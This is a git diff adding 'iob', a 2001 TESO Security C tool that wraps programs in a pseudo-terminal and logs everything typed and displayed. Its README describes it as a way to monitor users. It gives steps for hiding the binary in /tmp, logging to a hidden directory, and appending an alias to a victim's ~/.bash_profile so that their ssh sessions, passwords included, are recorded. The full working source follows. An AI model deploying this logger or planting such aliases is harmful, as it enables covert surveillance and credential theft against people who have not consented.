initial

7 files changed, 763 insertions, 0 deletions

diff --git a/other/iob/Makefile b/other/iob/Makefile
new file mode 100644
index 0000000..0d30e35
--- /dev/null
+++ b/other/iob/Makefile
@@ -0,0 +1,12 @@
+
+CFLAGS  += -Wall -O2
+
+all:    iob
+
+iob:    iob.c pty.o
+        $(CC) -o iob pty.o iob.c $(CFLAGS)
+
+clean:
+        rm -f iob
+        rm -f *.o
+
diff --git a/other/iob/README b/other/iob/README
new file mode 100644
index 0000000..f97fddc
--- /dev/null
+++ b/other/iob/README
@@ -0,0 +1,38 @@
+
+iob - i/o bridge
+version 0.1
+================
+
+simple, stupid tty chaining program
+
+
+used for:       - quick logging of any program
+                - specific non-root based logging
+                - monitoring of users (i.e. log all shell i/o)
+
+
+examples of use:
+
+user@host$ cat iob.c | egrep "^#define.+DEFAULT_LOG"
+#define DEFAULT_LOG     "/tmp/.log-term/"
+user@host$ cp iob /tmp
+user@host$ mkdir /tmp/.log-term
+user@host$ echo $SHELL
+/bin/bash
+user@host$ echo 'alias ssh="/tmp/iob -- ssh"' >> ~/.bash_profile
+
+
+now, if the user logs in, any ssh command he issues, except with hardcoded
+pathnames will trap into our tty chain, logging everything to a date-stamped
+file in the /tmp/.log-term/ directory. simple, stupid, working. do not forget
+to use the "--" option end marker in the alias. else getopt() will fuckup
+inside the iob program, if the user uses ssh options. if you want to log
+everything, run a shell from within his profile with an iob around it. if you
+have any problems compiling/using it somewhere, fix it yourself.
+
+advice: this is easy to detect, two extra processes are spawned per i/o chain,
+        it is far from being unobstrusive.
+
+
+-sc.
+
diff --git a/other/iob/iob b/other/iob/iob
new file mode 100755
index 0000000..91272c3
--- /dev/null
+++ b/other/iob/iob
diff --git a/other/iob/iob.c b/other/iob/iob.c
new file mode 100644
index 0000000..5cd7f8c
--- /dev/null
+++ b/other/iob/iob.c
@@ -0,0 +1,303 @@
+/* iob - i/o bridge
+ *
+ * (C) COPYRIGHT TESO Security, 2001
+ * All Rights Reserved
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright notice,
+ *    this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright notice,
+ *    this list of conditions and the following disclaimer in the documentation
+ *    and/or other materials provided with the distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *
+ *    This product includes software developed by TESO Security.
+ *
+ * 4. The name of TESO Security may not be used to endorse or promote products
+ *    derived from this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY TESO ``AS IS'' AND ANY EXPRESS OR IMPLIED
+ * WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
+ * EVENT SHALL TESO SECURITY BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
+ * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
+ * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
+ * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
+ * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
+ * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ *
+ *****************************************************************************
+ * by scut 2001/10
+ */
+
+/* mod here */
+#define DEFAULT_LOG     "/tmp/.log-term/"
+
+/* do not modify from here on
+ */
+#define VERSION "0.1"
+
+#include <sys/types.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <termios.h>
+#include <string.h>
+#include <time.h>
+
+#ifndef TIOCGWINSZ
+#include <sys/ioctl.h>
+#endif
+#include "pty.h"
+
+
+/* logging related data
+ */
+int     log_in = 1;             /* log input flag */
+int     log_out = 1;            /* log output flag */
+char *  log_dir = DEFAULT_LOG;  /* default log directory */
+
+FILE *  log_fi = NULL;
+FILE *  log_fo = NULL;
+
+char    log_outn[256],
+        log_inn[256];
+
+
+static volatile sig_atomic_t    sigcaught = 0;
+int                             ts_fd_save;
+struct termios                  ts_saved;       /* before going to raw */
+int                             brute_output_fd = 0;
+
+
+void usage (char *progname);
+void tty_atexit (void);
+static void t_loop (int ptym);
+
+
+void
+usage (char *progname)
+{
+        fprintf (stderr, "iob - version "VERSION"\n\n");
+        fprintf (stderr, "usage: %s [-h] [-d dir] [-i <0|1>] [-o <0|1>] <argv>\n\n"
+                "-h\t\tprint this help\n"
+                "-d <dir>\tlog to 'dir' directory (default: " DEFAULT_LOG ")\n"
+                "-i <0|1>\tlog input data (default: true, 1)\n"
+                "-o <0|1>\tlog output data (default: true, 1)\n\n",
+                progname);
+
+        exit (EXIT_SUCCESS);
+}
+
+
+int
+main (int argc, char *argv[])
+{
+        char                    c;
+        char **                 n_argv;
+        int                     interactive,    /* != 0 if we are at a tty */
+                                fdm;            /* pty master fd */
+
+        time_t                  tnow;
+        struct tm *             tm_now;
+
+        pid_t                   mpid;           /* pid used for forking */
+        char                    slave_name[20]; /* name of slave pty file */
+        char                    log_time[64];
+
+        /* original terminal properties in case we are already bound to
+         * a tty
+         */
+        struct termios          ts_orig;
+        struct termios *        ts_init = NULL;
+        struct winsize          ws_orig;
+        struct winsize *        ws_init = NULL;
+
+
+        while ((c = getopt (argc, argv, "hd:i:o:")) != EOF) {
+                switch (c) {
+                case 'h':
+                        usage (argv[0]);
+                        break;
+                case 'd':
+                        if (strlen (optarg) == 0)
+                                exit (EXIT_FAILURE);
+
+                        log_dir = malloc (strlen (optarg) + 2);
+                        strcpy (log_dir, optarg);
+
+                        if (log_dir[strlen (log_dir) - 1] != '/')
+                                strcat (log_dir, "/");
+                        break;
+                case 'i':
+                        log_in = (optarg[0] == '1') ? 1 : 0;
+                        break;
+                case 'o':
+                        log_out = (optarg[0] == '1') ? 1 : 0;
+                        break;
+                default:
+                        exit (EXIT_FAILURE);
+                        break;
+                }
+        }
+
+        n_argv = &argv[optind];
+        if (n_argv[0] == NULL)
+                usage (argv[0]);
+
+        if (n_argv[0] == argv[0] || strlen (n_argv[0]) == 0)
+                exit (EXIT_SUCCESS);
+
+        /* get time and open logfiles
+         */
+        time (&tnow);
+        tm_now = localtime (&tnow);
+        snprintf (log_time, sizeof (log_time),
+                "%04d%02d%02d_%02d%02d_%05d_%s",
+                tm_now->tm_year + 1900, tm_now->tm_mon + 1, tm_now->tm_mday,
+                tm_now->tm_hour, tm_now->tm_min,
+                getpid (),
+                strrchr (n_argv[0], '/') == NULL ? n_argv[0] :
+                        strrchr (n_argv[0], '/') + 1);
+
+        snprintf (log_inn, sizeof (log_inn), "%s%s.in", log_dir, log_time);
+        snprintf (log_outn, sizeof (log_outn), "%s%s.out", log_dir, log_time);
+
+
+        /* find out whether the current terminal is driven by another tty
+         * and in case it is, fetch the appropiate structures to pass to
+         * pty_fork
+         */
+        interactive = isatty (STDIN_FILENO);
+
+        if (interactive != 0) {
+                if (tcgetattr (STDIN_FILENO, &ts_orig) < 0)
+                        exit (EXIT_FAILURE);
+
+                ts_init = &ts_orig;
+
+                if (ioctl (STDIN_FILENO, TIOCGWINSZ, (char *) &ws_orig) < 0)
+                        exit (EXIT_FAILURE);
+
+                ws_init = &ws_orig;
+        }
+
+        mpid = pty_fork (&fdm, slave_name, ts_init, ws_init);
+        if (mpid < 0)
+                exit (EXIT_FAILURE);
+
+        /* in case we're a the child process, we execute a program
+         */
+        if (mpid == 0) {
+                execvp (n_argv[0], n_argv);
+
+                /* an error occured
+                 */
+                exit (EXIT_FAILURE);
+        }
+
+        if (interactive != 0) {
+                ts_fd_save = STDIN_FILENO;
+                if (tty_raw (STDIN_FILENO, &ts_saved) < 0)
+                        exit (EXIT_FAILURE);
+
+                /* install atexit cleanup handler
+                 */
+                if (atexit (tty_atexit) < 0)
+                        exit (EXIT_FAILURE);
+        }
+
+        t_loop (fdm);
+
+        exit (EXIT_SUCCESS);
+}
+
+
+void
+tty_atexit (void)
+{
+        tcsetattr (ts_fd_save, TCSAFLUSH, &ts_saved);
+
+        return;
+}
+
+
+static void
+t_loop (int ptym)
+{
+        pid_t   child;
+        int     nread;
+        char    buff[512];
+        FILE *  log_fo;
+
+
+        child = fork ();
+        if (child < 0)
+                exit (EXIT_FAILURE);
+
+        log_fi = log_fo = NULL;
+
+        if (child == 0) {
+                if (log_in) {
+                        log_fi = fopen (log_inn, "wb");
+                        if (log_fi == NULL)
+                                exit (EXIT_FAILURE);
+                }
+
+                /* child loop
+                 */
+                for ( ; ; ) {
+                        nread = read (STDIN_FILENO, buff, sizeof (buff));
+                        if (nread < 0)
+                                exit (EXIT_FAILURE);
+
+                        if (nread == 0)
+                                break;
+
+                        if (write (ptym, buff, nread) != nread)
+                                exit (EXIT_FAILURE);
+
+                        if (log_fi != NULL) {
+                                fwrite (buff, nread, 1, log_fi);
+                                fflush (log_fi);
+                        }
+                }
+        }
+
+        if (log_out) {
+                log_fo = fopen (log_outn, "wb");
+                if (log_fo == NULL)
+                        exit (EXIT_FAILURE);
+        }
+
+        /* parent loop
+         */
+        for ( ; ; ) {
+
+                nread = read (ptym, buff, sizeof (buff));
+                if (nread <= 0)
+                        break;
+
+                if (write (STDOUT_FILENO, buff, nread) != nread)
+                        exit (EXIT_FAILURE);
+
+                if (log_fo != NULL) {
+                        fwrite (buff, nread, 1, log_fo);
+                        fflush (log_fo);
+                }
+        }
+
+        if (sigcaught == 0)
+                kill (child, SIGTERM);
+
+        return;
+}
+
+
diff --git a/other/iob/pty.c b/other/iob/pty.c
new file mode 100644
index 0000000..a2afa95
--- /dev/null
+++ b/other/iob/pty.c
@@ -0,0 +1,315 @@
+/* iob - i/o bridge
+ *
+ * by scut, based mostly of r. stevens masterpiece apue with some twirks
+ *
+ * pseudo tty handler
+ */
+
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <grp.h>
+#include <termios.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#ifndef TIOCGWINSZ
+#include <sys/ioctl.h>
+#endif
+#ifdef  SYS_V_RELEASE_4
+#include <stropts.h>
+#endif
+#include <unistd.h>
+
+
+#ifdef  SYS_V_RELEASE_4
+
+extern char     *ptsname (int);         /* prototype not in any system header */
+
+int
+pty_m_open (char *pts_name)
+{
+        char    *ptr;
+        int     fdm;
+
+        strcpy (pts_name, "/dev/ptmx");
+        fdm = open (pts_name, O_RDWR);
+        if (fdm < 0)
+                return (-1);
+
+        if (grantpt (fdm) < 0) {
+                close (fdm);
+                return (-2);
+        }
+
+        if (unlockpt (fdm) < 0) {
+                close (fdm);
+                return (-3);
+        }
+
+        ptr = ptsname (fdm);
+        if (ptr == NULL) {
+                close (fdm);
+                return (-4);
+        }
+
+        strcpy (pts_name, ptr);
+
+        return (fdm);
+}
+
+
+int
+pty_s_open (int fdm, char *pts_name)
+{
+        int     fds;
+
+        fds = open (pts_name, O_RDWR);
+        if (fds < 0) {
+                close (fdm);
+                return (-5);
+        }
+
+        if (ioctl (fds, I_PUSH, "ptem") < 0) {
+                close (fdm);
+                close (fds);
+                return (-6);
+        }
+
+        if (ioctl (fds, I_PUSH, "ldterm") < 0) {
+                close (fdm);
+                close (fds);
+                return (-7);
+        }
+
+        if (ioctl (fds, I_PUSH, "ttcompat") < 0) {
+                close (fdm);
+                close (fds);
+                return (-8);
+        }
+
+        return (fds);
+}
+
+#else
+
+
+int
+pty_m_open (char *pts_name)
+{
+        int     fdm;
+        char    *ptr1,
+                *ptr2;
+
+        strcpy (pts_name, "/dev/ptyXY");
+        for (ptr1 = "pqrstuvwxyzPQRST" ; *ptr1 != 0 ; ++ptr1) {
+                pts_name[8] = *ptr1;
+
+                for (ptr2 = "0123456789abcdef" ; *ptr2 != 0 ; ++ptr2) {
+                        pts_name[9] = *ptr2;
+                        fdm = open (pts_name, O_RDWR);
+                        if (fdm < 0) {
+                                if (errno == ENOENT)
+                                        return (-1);
+                                else
+                                        continue;
+                        }
+
+                        pts_name[5] = 't';
+
+                        return (fdm);
+                }
+        }
+
+        return (-1);
+}
+
+
+int
+pty_s_open (int fdm, char *pts_name)
+{
+        struct group    *grp_ptr;
+        int             gid,
+                        fds;
+
+        grp_ptr = getgrnam ("tty");
+        if (grp_ptr != NULL)
+                gid = grp_ptr->gr_gid;
+        else
+                gid = -1;
+
+        chown (pts_name, getuid (), gid);
+        chmod (pts_name, S_IRUSR | S_IWUSR | S_IWGRP);
+
+        fds = open (pts_name, O_RDWR);
+        if (fds < 0) {
+                close (fdm);
+
+                return (-1);
+        }
+
+        return (fds);
+}
+
+#endif
+
+
+/* pty_fork
+ *
+ */
+
+pid_t
+pty_fork (int *fd_master_ptr, char *slave_name,
+        const struct termios *slave_termios,
+        const struct winsize *slave_winsize)
+{
+        int     fdm,
+                fds;
+        pid_t   pid;
+        char    pts_name[20];
+
+        fdm = pty_m_open (pts_name);
+        if (fdm < 0) {
+                exit (EXIT_FAILURE);
+        }
+
+        if (slave_name != NULL)
+                strcpy (slave_name, pts_name);
+
+        pid = fork ();
+        if (pid < 0)
+                return (-1);
+
+        if (pid == 0) {
+                if (setsid () < 0)
+                        exit (EXIT_FAILURE);
+                fds = pty_s_open (fdm, pts_name);
+                if (fds < 0)
+                        exit (EXIT_FAILURE);
+                close (fdm);
+
+#if defined(TIOCSCTTY) && !defined(CIBAUD)
+                if (ioctl (fds, TIOCSCTTY, (char *) 0) < 0)
+                        exit (EXIT_FAILURE);
+#endif
+                if (slave_termios != NULL) {
+                        if (tcsetattr (fds, TCSANOW, slave_termios) < 0)
+                                exit (EXIT_FAILURE);
+                }
+                if (slave_winsize != NULL) {
+                        if (ioctl (fds, TIOCSWINSZ, slave_winsize) < 0)
+                                exit (EXIT_FAILURE);
+                }
+
+                if (dup2 (fds, STDIN_FILENO) != STDIN_FILENO ||
+                        dup2 (fds, STDOUT_FILENO) != STDOUT_FILENO ||
+                        dup2 (fds, STDERR_FILENO) != STDERR_FILENO)
+                {
+                        exit (EXIT_FAILURE);
+                }
+                if (fds > STDERR_FILENO)
+                        close (fds);
+
+                return (0);     /* just like fork (), child */
+        } else {
+                *fd_master_ptr = fdm;
+
+                return (pid);
+        }
+}
+
+
+void
+set_noecho (int fd)
+{
+        struct termios  stermios;
+
+        if (tcgetattr (fd, &stermios) < 0)
+                exit (EXIT_FAILURE);
+
+        stermios.c_lflag &= ~(ECHO | ECHOE | ECHOK | ECHONL);
+        stermios.c_oflag &= ~(ONLCR);
+
+        if (tcsetattr (fd, TCSANOW, &stermios) < 0)
+                exit (EXIT_FAILURE);
+
+        return;
+}
+
+
+int
+tty_raw (int fd, struct termios *sios)
+{
+        struct termios  tios;
+
+
+        if (sios != NULL && tcgetattr (fd, sios) < 0)
+                return (-1);
+
+        /* saved old termios structure, now copy it to work with it
+         */
+        memcpy (&tios, sios, sizeof (struct termios));
+
+        tios.c_lflag &= ~(ECHO | ICANON | IEXTEN | ISIG);
+        tios.c_iflag &= ~(BRKINT | ICRNL | INPCK | ISTRIP | IXON);
+        tios.c_cflag &= ~(CSIZE | PARENB);
+        tios.c_cflag |= CS8;
+        tios.c_oflag &= ~(OPOST);
+        tios.c_cc[VMIN] = 1;
+        tios.c_cc[VTIME] = 0;
+
+        if (tcsetattr (fd, TCSAFLUSH, &tios) < 0)
+                return (-1);
+
+        return (0);
+}
+
+
+int
+pty_setup (void (* handler)(void *), void *data)
+{
+        int                     interactive,
+                                fdm;
+        pid_t                   mpid;
+
+        char                    slave_name[20];
+        struct termios          ts_orig;
+        struct termios *        ts_init = NULL;
+        struct winsize          ws_orig;
+        struct winsize *        ws_init = NULL;
+
+
+        interactive = isatty (STDIN_FILENO);
+        if (interactive != 0) {
+                if (tcgetattr (STDIN_FILENO, &ts_orig) < 0)
+                        exit (EXIT_FAILURE);
+
+                ts_init = &ts_orig;
+
+                if (ioctl (STDIN_FILENO, TIOCGWINSZ, (char *) &ws_orig) < 0)
+                        exit (EXIT_FAILURE);
+
+                ws_init = &ws_orig;
+        }
+
+        mpid = pty_fork (&fdm, slave_name, ts_init, ws_init);
+        if (mpid < 0)
+                exit (EXIT_FAILURE);
+
+        /* child calls handler
+         */
+        if (mpid == 0) {
+                handler (data);
+
+                /* handler shouldn't return
+                 */
+                printf ("pty handler returned, failure\n");
+                exit (EXIT_FAILURE);
+        }
+
+        /* parent just returns master filedescriptor
+         */
+        return (fdm);
+}
+
diff --git a/other/iob/pty.h b/other/iob/pty.h
new file mode 100644
index 0000000..864965d
--- /dev/null
+++ b/other/iob/pty.h
@@ -0,0 +1,95 @@
+/* brutate
+ *
+ * scut / team teso
+ *
+ * pseudo tty handler include file
+ */
+
+#ifndef BR_PTY_H
+#define BR_PTY_H
+
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <termios.h>
+
+
+/* pty_m_open
+ *
+ * open master pty and return actual file used in `pts_name', which has
+ * to point to allocated memory and must be at least 20 bytes long.
+ *
+ * return master pty filedescriptor in case of success
+ * return negative error number in case of failure
+ */
+
+int     pty_m_open (char *pts_name);
+
+
+/* pty_s_open
+ *
+ * open slave pty with filename pointed to by `pts_name' and bind it to
+ * master pty with descriptor `fdm'.
+ *
+ * return slave pty filedescriptor in case of success
+ * return negative error number in case of failure
+ */
+
+int     pty_s_open (int fdm, char *pts_name);
+
+
+/* pty_fork
+ *
+ * fork a child process and create a pty binding between this parent process
+ * (master pty) and the child process (slave pty). return the master pty
+ * filedescriptor through `fd_master_ptr'. `slave_name' may be NULL or contain
+ * a pointer to allocated memory where the slave pty name will be stored.
+ * `slave_termios' may be NULL or contain a valid termios structure which will
+ * initialize the slave terminal line discipline. in case `slave_winsize' is
+ * not NULL it will initialize the slave pty window size.
+ *
+ * return values are the same as the ones of fork(2) (see "man 2 fork").
+ */
+
+pid_t   pty_fork (int *fd_master_ptr, char *slave_name,
+        const struct termios *slave_termios,
+        const struct winsize *slave_winsize);
+
+
+/* set_noecho
+ *
+ * disable echo capability on terminal associated with filedescriptor `fd'
+ *
+ * return in any case
+ */
+
+void    set_noecho (int fd);
+
+
+/* tty_raw
+ *
+ * put terminal associated with filedescriptor `fd' into raw mode, saving the
+ * current mode into the termios structure pointed to by `sios' in case it is
+ * non-NULL
+ *
+ * return 0 on success
+ * return -1 on failure
+ */
+
+int     tty_raw (int fd, struct termios *sios);
+
+
+/* pty_setup
+ *
+ * helper routine, which allocates a pseudo terminal and tries to preserve
+ * as much settings as possible from the current terminal. then it forks
+ * away a child process in which nothing happens except that the handler
+ * function `handler' is called with `data' as parameter.
+ *
+ * returns the filedescriptor of the pty on success
+ * exits in case of failure
+ */
+
+int     pty_setup (void (* handler)(void *), void *data);
+
+#endif
+
diff --git a/other/iob/pty.o b/other/iob/pty.o
new file mode 100644
index 0000000..a4e25b2
--- /dev/null
+++ b/other/iob/pty.o